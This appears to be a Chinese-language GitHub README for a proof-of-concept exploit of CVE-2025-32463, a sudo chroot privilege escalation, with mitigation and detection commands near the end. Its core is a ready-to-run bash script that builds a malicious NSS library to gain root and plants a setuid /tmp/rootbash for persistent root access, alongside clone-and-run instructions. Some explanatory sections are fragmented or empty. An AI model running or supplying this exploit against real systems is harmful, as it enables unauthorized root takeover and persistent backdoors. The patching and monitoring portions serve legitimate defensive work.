CVE-2025-32463 是 sudo 版本 1.9.14 至 1.9.17 中存在的一个严重本地权限提升漏洞。该漏洞允许具有 sudo 权限的攻击者利用 chroot 选项处理逻辑中的设计缺陷,将权限提升至 root。
该漏洞是由于 sudo 安全验证过程中的时序问题 导致的。pivot_root 函数在 安全策略验证之前 被执行,使攻击者能够操纵 sudo 用于身份验证和授权的文件系统环境。
nsswitch.confpivot_root:在进程执行过程中过早被调用set_cmnd_path:在被操纵的环境中运行command_matches:由于环境操纵导致安全检查被绕过使用此漏洞利用工具前,请确保满足以下条件:
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
chmod +x cve-2025-32463.sh
./cve-2025-32463.sh
检查目标系统是否存在漏洞:
# 检查 sudo 版本
sudo --version
# 检查 sudo 权限
sudo -l
# 查找与 chroot 相关的权限
sudo -l | grep chroot
主要的漏洞利用脚本(cve-2025-32463.sh):
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF
mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c
echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest
# Cleanup
rm -rf ${STAGE?}
成功利用漏洞后,验证 root 访问权限:
# 检查当前权限
whoami
# 检查证明文件
cat /tmp/pwned_proof.txt
# 使用 setuid bash 获取持久 root 访问权限
/tmp/rootbash -p
将 sudo 更新 至 1.9.17p1 或更高版本:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
# 或
sudo dnf update sudo
从 sudoers 中删除 chroot 指令(临时解决方案):
# 备份当前配置
sudo cp /etc/sudoers /etc/sudoers.backup
# 删除与 chroot 相关的条目
sudo sed -i '/chroot/d' /etc/sudoers
# 验证语法
sudo visudo -c
监控漏洞利用尝试:
# 检查可疑的临时目录
find /tmp -name "*.stage.*" -type d
# 监控 sudo 日志
tail -f /var/log/auth.log | grep sudo
# 查找 NSS 库编译文件
find /tmp -name "libnss_*.so*" -type f
该漏洞源于 sudo 执行流程中的设计缺陷:
正常的预期流程:
实际存在漏洞的流程:
该漏洞利用利用了名称服务切换(NSS)系统:
/etc/nsswitch.conf 进行用户身份验证此漏洞利用已在以下环境中测试通过:
⚠️ 重要声明 ⚠️
本工具仅用于 教育和授权测试目的。
欢迎贡献!请:
本项目采用 MIT 许可证授权 - 详情请参阅 LICENSE 文件。
注意:此漏洞影响关键系统组件。请负责任地使用,并确保所有测试均已获得授权。